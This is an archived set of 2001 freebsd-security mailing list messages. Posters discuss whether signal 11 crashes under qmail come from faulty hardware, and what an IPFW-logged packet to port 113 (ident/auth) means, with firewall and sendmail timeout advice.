Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 In-Reply-To: <019b01c0e2fe$eb384d40$3028680a@tgt.com> Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Same here, I have found that random sig 11's are often caused by memory or CPU problems. One thing to try is underclocking - if you are running 133 underclock to 100 Steve > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Thomas T. > Veldhouse > Sent: Tuesday, May 22, 2001 1:37 PM > To: Michael Tang Helmeste; freebsd-security@freebsd.org > Subject: Re: Qmail + FreeBSD 4.3 > > > Swap memory and see. I had the same problem (different program). Apache > kept dying was my first symptom. Then postfix died occassionally. MySQL > dumped when used. A few things like that. It started happening > on a system > that had been working for the better part of a year. It was the CPU. > > Sig 11 more often than not is a hardware problem. There is only > one case I > know of that I can reproducibly create a sig 11 when it is not > hardware. If > you run ncftp3 against a server and download a large directory using the > "tar on the fly option", it will often dump core. This could be the case > with qmail, but I have not seen it reported, thus I think he should check > his hardware. > > Tom Veldhouse > > ----- Original Message ----- > From: "Michael Tang Helmeste" > To: "Thomas T. Veldhouse" ; > > Sent: Tuesday, May 22, 2001 3:31 PM > Subject: RE: Qmail + FreeBSD 4.3 > > > > Well bad hardware is less likely than its trying to overwrite memory it > > doesn't own. If he is being attacked, and it is a buffer > overflow exploit, > > than overwriting memory it doesn't own is more likely than it being > > repeatidly hardware, especially after his system has been > working fine all > > this time. > > > > -----Original Message----- > > From: Thomas T. Veldhouse [mailto:veldy@veldy.net] > > Sent: Tuesday, May 22, 2001 9:16 AM > > To: Michael Tang Helmeste > > Subject: Re: Qmail + FreeBSD 4.3 > > > > > > Signal 11 (and often10) very often signal bad hardware. Memory > and/or CPU > > are usually the cause, followed by the main board. Corruption occurs in > > memory and a signal 11 results. > > > > Tom Veldhouse > > veldy@veldy.net > > > > ----- Original Message ----- > > From: "Michael Tang Helmeste" > > To: > > Sent: Monday, May 21, 2001 8:35 PM > > Subject: RE: Qmail + FreeBSD 4.3 > > > > > > > actually it just means segmentation fault > > > > > > it happens when a program accesses some memory that it doesn't own > > > > > > -----Original Message----- > > > From: owner-freebsd-security@FreeBSD.ORG > > > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Olivier Nicole > > > Sent: Monday, May 21, 2001 9:17 PM > > > To: subscribed@de-net.org > > > Cc: freebsd-security@FreeBSD.ORG > > > Subject: Re: Qmail + FreeBSD 4.3 > > > > > > > > > Hi Dan, > > > > > > Signa 11 often denotes some hardware problem I guess, something like > > > overheating. > > > > > > Olivier > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 25 11:18: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from kottan-labs.bgsu.edu (kottan-labs.bgsu.edu [129.1.148.220]) by hub.freebsd.org (Postfix) with SMTP id 8FB2837B424 for ; Fri, 25 May 2001 11:18:01 -0700 (PDT) (envelope-from memphis_ms@gmx.net) Received: (qmail 4401 invoked from network); 25 May 2001 14:20:24 -0400 Received: from raoul.bgsu.edu (HELO gmx.net) (129.1.148.16) by kottan-labs.bgsu.edu with RC4-MD5 encrypted SMTP; 25 May 2001 14:20:24 -0400 Message-ID: <3B0EA2AE.5B00EB2@gmx.net> Date: Fri, 25 May 2001 14:21:34 -0400 From: Raoul Schroeder X-Mailer: Mozilla 4.74 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: FreeBSD Security Subject: 'nother IPFW question Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org IPFW caught a TCP packet leaving my port 1119 going to another port 113 I am a little worried about this, since there is nothing running on my machine on 1119 that I know of. Is there a good way of finding out what is sending on port 1119? I am only learning about securing my box, and it is hard to find all the info I need. Thank you so much, Raoul To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 25 11:19:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id 6EA1637B422 for ; Fri, 25 May 2001 11:19:48 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 9046 invoked from network); 25 May 2001 18:22:50 -0000 Received: from localhost (HELO book) (root@127.0.0.1) by localhost with SMTP; 25 May 2001 18:22:50 -0000 Message-ID: <004301c0e547$450d6b80$01000001@book> From: "alexus" To: "Raoul Schroeder" , "FreeBSD Security" References: <3B0EA2AE.5B00EB2@gmx.net> Subject: Re: 'nother IPFW question Date: Fri, 25 May 2001 14:19:42 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org a sniffer would probably help.. ----- Original Message ----- From: "Raoul Schroeder" To: "FreeBSD Security" Sent: Friday, May 25, 2001 2:21 PM Subject: 'nother IPFW question > IPFW caught a TCP packet leaving my port 1119 going to another port 113 > I am a little worried about this, since there is nothing running on my > machine on 1119 that I know of. > > Is there a good way of finding out what is sending on port 1119? I am > only learning about securing my box, and it is hard to find all the info > I need. > > Thank you so much, > > Raoul > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 25 11:28: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id 987B737B422 for ; Fri, 25 May 2001 11:28:07 -0700 (PDT) (envelope-from dillon@earth.backplane.com) Received: (from dillon@localhost) by earth.backplane.com (8.11.3/8.11.2) id f4PIS1Y41320; Fri, 25 May 2001 11:28:01 -0700 (PDT) (envelope-from dillon) Date: Fri, 25 May 2001 11:28:01 -0700 (PDT) From: Matt Dillon Message-Id: <200105251828.f4PIS1Y41320@earth.backplane.com> To: Raoul Schroeder Cc: FreeBSD Security Subject: Re: 'nother IPFW question References: <3B0EA2AE.5B00EB2@gmx.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org :IPFW caught a TCP packet leaving my port 1119 going to another port 113 :I am a little worried about this, since there is nothing running on my :machine on 1119 that I know of. : :Is there a good way of finding out what is sending on port 1119? I am :only learning about securing my box, and it is hard to find all the info :I need. : :Thank you so much, : :Raoul Sounds like one of your users simply ran a pop based mail program. -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 25 11:29:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from gyw.com (gyw.com [209.55.67.177]) by hub.freebsd.org (Postfix) with ESMTP id 8F77037B423 for ; Fri, 25 May 2001 11:29:18 -0700 (PDT) (envelope-from tjk@tksoft.com) Received: from smtp3.tksoft.com (smtp3.tksoft.com [192.168.50.56] (may be forged)) by gyw.com (8.8.8/8.8.8) with ESMTP id KAA23734; Fri, 25 May 2001 10:28:39 -0700 Received: (from tjk@tksoft.com) by smtp3.tksoft.com (8.8.8/8.8.8) id KAA32060; Fri, 25 May 2001 10:22:07 -0700 From: "tjk@tksoft.com" Message-Id: <200105251722.KAA32060@smtp3.tksoft.com> Subject: Re: 'nother IPFW question To: memphis_ms@gmx.net (Raoul Schroeder) Date: Fri, 25 May 2001 10:22:06 -0700 (PDT) Cc: freebsd-security@FreeBSD.ORG (FreeBSD Security) In-Reply-To: from "Raoul Schroeder" at May 25, 2001 02:21:34 PM X-Info: None MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Raoul, 1119 was probably a randomly selected port for the outgoing connection. Try connecting to a web server somewhere. You will always get a different port on your local side. Port 113 is authd. Therefore, if you have sendmail running on your machine, the query was most likely generated by sendmail as it was trying establish the identity of a sender from the remote machine. (sendmail always tries authd first. Failure to connect is not fatal.) lsof will tell you what application is using the port. lsof -i tcp:1119 Troy > > IPFW caught a TCP packet leaving my port 1119 going to another port 113 > I am a little worried about this, since there is nothing running on my > machine on 1119 that I know of. > > Is there a good way of finding out what is sending on port 1119? I am > only learning about securing my box, and it is hard to find all the info > I need. > > Thank you so much, > > Raoul > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 25 11:56:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.yadt.co.uk (yadt.demon.co.uk [158.152.4.134]) by hub.freebsd.org (Postfix) with SMTP id 71B0A37B423 for ; Fri, 25 May 2001 11:56:23 -0700 (PDT) (envelope-from davidt@yadt.co.uk) Received: (qmail 72029 invoked from network); 25 May 2001 18:56:20 -0000 Received: from gattaca.local.yadt.co.uk (HELO mail.gattaca.yadt.co.uk) (qmailr@10.0.0.2) by xfiles.yadt.co.uk with SMTP; 25 May 2001 18:56:20 -0000 Received: (qmail 23422 invoked by uid 1000); 25 May 2001 18:56:20 -0000 Date: Fri, 25 May 2001 19:40:56 +0100 From: David Taylor To: Matt Dillon Subject: Re: 'nother IPFW question Message-ID: <20010525194056.A19706@gattaca.yadt.co.uk> References: <3B0EA2AE.5B00EB2@gmx.net> <200105251828.f4PIS1Y41320@earth.backplane.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="RnlQjJ0d97Da+TV1" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200105251828.f4PIS1Y41320@earth.backplane.com>; from dillon@earth.backplane.com on Fri, May 25, 2001 at 11:28:01 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --RnlQjJ0d97Da+TV1 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, 25 May 2001, Matt Dillon wrote: >=20 > :IPFW caught a TCP packet leaving my port 1119 going to another port 113 > :I am a little worried about this, since there is nothing running on my > :machine on 1119 that I know of. > : > :Is there a good way of finding out what is sending on port 1119? I am > :only learning about securing my box, and it is hard to find all the info > :I need. > : > :Thank you so much, > : > :Raoul >=20 > Sounds like one of your users simply ran a pop based mail program. >=20 Wrong port, I think :) POP is 110. 113 is auth. Sounds like someone on a remote server connected to some port on your box, which tried to perform an ident lookup... As for what is 'sending on port 1119', ports which are used on the local end of outgoing connections are essentially random, and are allocated by the kernel when you try to create an outgoing connection. --=20 David Taylor davidt@yadt.co.uk --RnlQjJ0d97Da+TV1 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7Dqc4fIqKXSsJ/xERAoEaAJ4iv6KoeIDJi3/1ELPREbz7sRml9wCgm/k7 JJyLliwHj/Y3vW8x3/IUWb0= =bw86 -----END PGP SIGNATURE----- --RnlQjJ0d97Da+TV1-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 25 12:20:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id BC84C37B423 for ; Fri, 25 May 2001 12:20:14 -0700 (PDT) (envelope-from dillon@earth.backplane.com) Received: (from dillon@localhost) by earth.backplane.com (8.11.3/8.11.2) id f4PJK6L42034; Fri, 25 May 2001 12:20:06 -0700 (PDT) (envelope-from dillon) Date: Fri, 25 May 2001 12:20:06 -0700 (PDT) From: Matt Dillon Message-Id: <200105251920.f4PJK6L42034@earth.backplane.com> To: "tjk@tksoft.com" , memphis_ms@gmx.net (Raoul Schroeder), David Taylor Cc: freebsd-security@FreeBSD.ORG (FreeBSD Security) Subject: Re: 'nother IPFW question References: <3B0EA2AE.5B00EB2@gmx.net> <200105251828.f4PIS1Y41320@earth.backplane.com> <20010525194056.A19706@gattaca.yadt.co.uk> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Whup! Not pop. Auth. It's probably sendmail. In anycase, not anything that generally needs to be worried about. I usually do not run identd, but I usually do allow the service through the firewall so the server not running it can respond with a TCP reset. Otherwise remote sendmails using auth will stall trying to send email to you for ~30 seconds. Alternatively the firewall can be programmed to return an ICMP error itself, but I try to avoid having the firewall do actual work to make it more resistent to DOS attacks. -Matt :> :only learning about securing my box, and it is hard to find all the info :> :I need. :> : :> :Thank you so much, :> : :> :Raoul :>=20 :> Sounds like one of your users simply ran a pop based mail program. :>=20 : :Wrong port, I think :) : :POP is 110. : :113 is auth. : :Sounds like someone on a remote server connected to some port on your box, :which tried to perform an ident lookup... : :As for what is 'sending on port 1119', ports which are used on the local end :of outgoing connections are essentially random, and are allocated by the :kernel when you try to create an outgoing connection. : :--=20 :David Taylor :davidt@yadt.co.uk To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 25 14:49:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from stimpy.net (adsl-63-193-11-3.dsl.snfc21.pacbell.net [63.193.11.3]) by hub.freebsd.org (Postfix) with ESMTP id 7FC9637B423 for ; Fri, 25 May 2001 14:49:38 -0700 (PDT) (envelope-from jgross@stimpy.net) Received: by stimpy.net (Postfix, from userid 314) id D896B3010A; Fri, 25 May 2001 14:49:37 -0700 (PDT) Date: Fri, 25 May 2001 14:49:37 -0700 From: Joe Gross To: FreeBSD Security Subject: Re: 'nother IPFW question Message-ID: <20010525144937.A60462@felix.stimpy.net> References: <3B0EA2AE.5B00EB2@gmx.net> <200105251828.f4PIS1Y41320@earth.backplane.com> <20010525194056.A19706@gattaca.yadt.co.uk> <200105251920.f4PJK6L42034@earth.backplane.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200105251920.f4PJK6L42034@earth.backplane.com>; from dillon@earth.backplane.com on Fri, May 25, 2001 at 12:20:06PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, May 25, 2001 at 12:20:06PM -0700, Matt Dillon wrote: > > I usually do not run identd, but I usually do allow the service > through the firewall so the server not running it can respond with a > TCP reset. Otherwise remote sendmails using auth will stall trying > to send email to you for ~30 seconds. Alternatively the firewall can > be programmed to return an ICMP error itself, but I try to avoid > having the firewall do actual work to make it more resistent to DOS > attacks. Augh! Why wouldn't you just have the firewall refuse the connection? It's a bad idea to pass anything through your firewall that you don't want on your internal network. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 25 16:19:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from tomts14-srv.bellnexxia.net (tomts14.bellnexxia.net [209.226.175.35]) by hub.freebsd.org (Postfix) with ESMTP id 2389637B422 for ; Fri, 25 May 2001 16:19:20 -0700 (PDT) (envelope-from glassfish@glassfish.net) Received: from frogbox.glassfish.net ([64.230.27.99]) by tomts14-srv.bellnexxia.net (InterMail vM.4.01.03.16 201-229-121-116-20010115) with SMTP id <20010525231919.FNZ28559.tomts14-srv.bellnexxia.net@frogbox.glassfish.net> for ; Fri, 25 May 2001 19:19:19 -0400 Received: (qmail 32781 invoked from network); 25 May 2001 23:21:30 -0000 Received: from unknown (HELO MAINWS) (192.0.0.20) by 192.0.0.4 with SMTP; 25 May 2001 23:21:30 -0000 From: "Michael Tang Helmeste" To: Subject: RE: Qmail + FreeBSD 4.3 Date: Fri, 25 May 2001 19:18:27 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.00.3018.1300 In-Reply-To: <027f01c0e545$b4407080$3da2169d@napanet.net> Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I guess my systems are pretty stable. I've never seemed to have any hardware related problems like that. -----Original Message----- From: Steve Brown [mailto:steve@napanet.net] Sent: Friday, May 25, 2001 2:09 PM To: Thomas T. Veldhouse; Michael Tang Helmeste; freebsd-security@freebsd.org Subject: RE: Qmail + FreeBSD 4.3 Same here, I have found that random sig 11's are often caused by memory or CPU problems. One thing to try is underclocking - if you are running 133 underclock to 100 Steve > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Thomas T. > Veldhouse > Sent: Tuesday, May 22, 2001 1:37 PM > To: Michael Tang Helmeste; freebsd-security@freebsd.org > Subject: Re: Qmail + FreeBSD 4.3 > > > Swap memory and see. I had the same problem (different program). Apache > kept dying was my first symptom. Then postfix died occassionally. MySQL > dumped when used. A few things like that. It started happening > on a system > that had been working for the better part of a year. It was the CPU. > > Sig 11 more often than not is a hardware problem. There is only > one case I > know of that I can reproducibly create a sig 11 when it is not > hardware. If > you run ncftp3 against a server and download a large directory using the > "tar on the fly option", it will often dump core. This could be the case > with qmail, but I have not seen it reported, thus I think he should check > his hardware. > > Tom Veldhouse > > ----- Original Message ----- > From: "Michael Tang Helmeste" > To: "Thomas T. Veldhouse" ; > > Sent: Tuesday, May 22, 2001 3:31 PM > Subject: RE: Qmail + FreeBSD 4.3 > > > > Well bad hardware is less likely than its trying to overwrite memory it > > doesn't own. If he is being attacked, and it is a buffer > overflow exploit, > > than overwriting memory it doesn't own is more likely than it being > > repeatidly hardware, especially after his system has been > working fine all > > this time. > > > > -----Original Message----- > > From: Thomas T. Veldhouse [mailto:veldy@veldy.net] > > Sent: Tuesday, May 22, 2001 9:16 AM > > To: Michael Tang Helmeste > > Subject: Re: Qmail + FreeBSD 4.3 > > > > > > Signal 11 (and often10) very often signal bad hardware. Memory > and/or CPU > > are usually the cause, followed by the main board. Corruption occurs in > > memory and a signal 11 results. > > > > Tom Veldhouse > > veldy@veldy.net > > > > ----- Original Message ----- > > From: "Michael Tang Helmeste" > > To: > > Sent: Monday, May 21, 2001 8:35 PM > > Subject: RE: Qmail + FreeBSD 4.3 > > > > > > > actually it just means segmentation fault > > > > > > it happens when a program accesses some memory that it doesn't own > > > > > > -----Original Message----- > > > From: owner-freebsd-security@FreeBSD.ORG > > > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Olivier Nicole > > > Sent: Monday, May 21, 2001 9:17 PM > > > To: subscribed@de-net.org > > > Cc: freebsd-security@FreeBSD.ORG > > > Subject: Re: Qmail + FreeBSD 4.3 > > > > > > > > > Hi Dan, > > > > > > Signa 11 often denotes some hardware problem I guess, something like > > > overheating. > > > > > > Olivier > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 25 17:56:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.cs.ait.ac.th (mail.cs.ait.ac.th [192.41.170.16]) by hub.freebsd.org (Postfix) with ESMTP id F208637B422 for ; Fri, 25 May 2001 17:56:30 -0700 (PDT) (envelope-from Olivier.Nicole@ait.ac.th) Received: from bazooka.cs.ait.ac.th (on@bazooka.cs.ait.ac.th [192.41.170.2]) by mail.cs.ait.ac.th (8.11.3/8.9.3) with ESMTP id f4QCLwY13565; Sat, 26 May 2001 19:21:59 +0700 (ICT) From: Olivier Nicole Received: (from on@localhost) by bazooka.cs.ait.ac.th (8.8.5/8.8.5) id HAA24510; Sat, 26 May 2001 07:55:34 +0700 (ICT) Date: Sat, 26 May 2001 07:55:34 +0700 (ICT) Message-Id: <200105260055.HAA24510@bazooka.cs.ait.ac.th> To: steve@napanet.net Cc: veldy@veldy.net, glassfish@frogbox.dyndns.org, freebsd-security@FreeBSD.ORG In-reply-to: <027f01c0e545$b4407080$3da2169d@napanet.net> (steve@napanet.net) Subject: RE: Qmail + FreeBSD 4.3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Well, shame on me, I did have a machine going sig 11 this Thursday, and it was not hardware problem. It was a real sementation fault in a piece of code I did not tested enough. Correcting the NULL pointer did the trick. But then it was not a random error either. Adding some cooling may help a lot too. Remember that most PC case do not provide adequate cooling to any component (read disk) except CPU. http://www.cs.ait.ac.th/laboratory/fan/ Some trick that work well, remove memory and clean the contacts with a ruber (eraser). Be sure you don't put back ruber dirt in the memory slot. Be sure you don't touch the memory contacts with your fingers. It applies also for PCI/ISA cards, as well as for CPU that used this vertical slot. Best regards, Olivier >Same here, I have found that random sig 11's are often caused by memory or >CPU problems. One thing to try is underclocking - if you are running 133 >underclock to 100 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 26 13:46:47 2001 Delivered-To: freebsd-security@freebsd.org Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id 4ED4237B424 for ; Sat, 26 May 2001 13:46:41 -0700 (PDT) (envelope-from sthaug@nethelp.no) Received: (qmail 71475 invoked by uid 1001); 26 May 2001 20:46:39 +0000 (GMT) To: jgross@stimpy.net Cc: freebsd-security@FreeBSD.ORG Subject: Re: 'nother IPFW question From: sthaug@nethelp.no In-Reply-To: Your message of "Fri, 25 May 2001 14:49:37 -0700" References: <20010525144937.A60462@felix.stimpy.net> X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Sat, 26 May 2001 22:46:38 +0200 Message-ID: <71473.990909998@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > Augh! Why wouldn't you just have the firewall refuse the connection? It's a > bad idea to pass anything through your firewall that you don't want on your > internal network. If you can get your firewall to send a TCP RST, it make sense. If your firewall simply drops the packet, you have just introduced quite a bit of delay in many of your email transactions (while the mail server at the other end waits for the IDENT request to timeout). Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 26 15: 7:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id 8A8E837B422 for ; Sat, 26 May 2001 15:07:16 -0700 (PDT) (envelope-from rsimmons@wlcg.com) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f4QM7eo85752; Sat, 26 May 2001 18:07:41 -0400 (EDT) (envelope-from rsimmons@wlcg.com) Date: Sat, 26 May 2001 18:07:37 -0400 (EDT) From: Rob Simmons To: sthaug@nethelp.no Cc: jgross@stimpy.net, freebsd-security@FreeBSD.ORG Subject: Re: 'nother IPFW question In-Reply-To: <71473.990909998@verdi.nethelp.no> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 Since you cannot control other people's firewalls, you should also set the IDENT timeout to 0 seconds with the following line in /etc/mail/.mc define(`confTO_IDENT', `0s') This will prevent any delays in sending mail to a mailserver behind a firewall that blocks incoming port 113 without sending a RST. I also add an ipf rule to just send an RST if the connection was attempted to the IP address of my mailserver. All other IPs that are not running mailservices, I have set to drop the incoming port 113 traffic on the floor, since its most likely that person trying to connect is a spammer trying to relay mail off my servers. I like to waste spammer's time. :) Robert Simmons Systems Administrator http://www.wlcg.com/ On Sat, 26 May 2001 sthaug@nethelp.no wrote: > > Augh! Why wouldn't you just have the firewall refuse the connection? It's a > > bad idea to pass anything through your firewall that you don't want on your > > internal network. > > If you can get your firewall to send a TCP RST, it make sense. If your > firewall simply drops the packet, you have just introduced quite a bit > of delay in many of your email transactions (while the mail server at > the other end waits for the IDENT request to timeout). > > Steinar Haug, Nethelp consulting, sthaug@nethelp.no > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.5 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7ECksv8Bofna59hYRA9BnAJ49rB0/wM+WpCbsLUbBFIpphSLYKwCZASbe 9T51K5J/k/a8VG3dL5i4Sm0= =M91I -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
=B9=DA=C1=F8=C7=FC (netbuilder) = =B4=D4=B2=B2 =BA=B8=B3=BB=BD=C5 =B8=DE=C0=CF <Re: ipfw problems.> =C0=CC = =B4=D9=C0=BD=B0=FA =B0=B0=C0=BA =C0=CC=C0=AF=B7=CE =C0=FC=BC=DB = =BD=C7=C6=D0=C7=DF=BD=C0=B4=CF=B4=D9.=20
--------------------------------------------
=BC=F6=BD=C5=C0=DA=C0=C7 = =B8=DE=C0=CF =BA=B8=B0=FC =BF=EB=B7=AE=C0=CC =B0=A1=B5=E6=C2=F7 = =C0=D6=BD=C0=B4=CF=B4=D9. =B3=AA=C1=DF=BF=A1 =B4=D9=BD=C3 = =BD=C3=B5=B5=C7=CF=BD=CA=BD=C3=BF=C0.=20
--------------------------------------------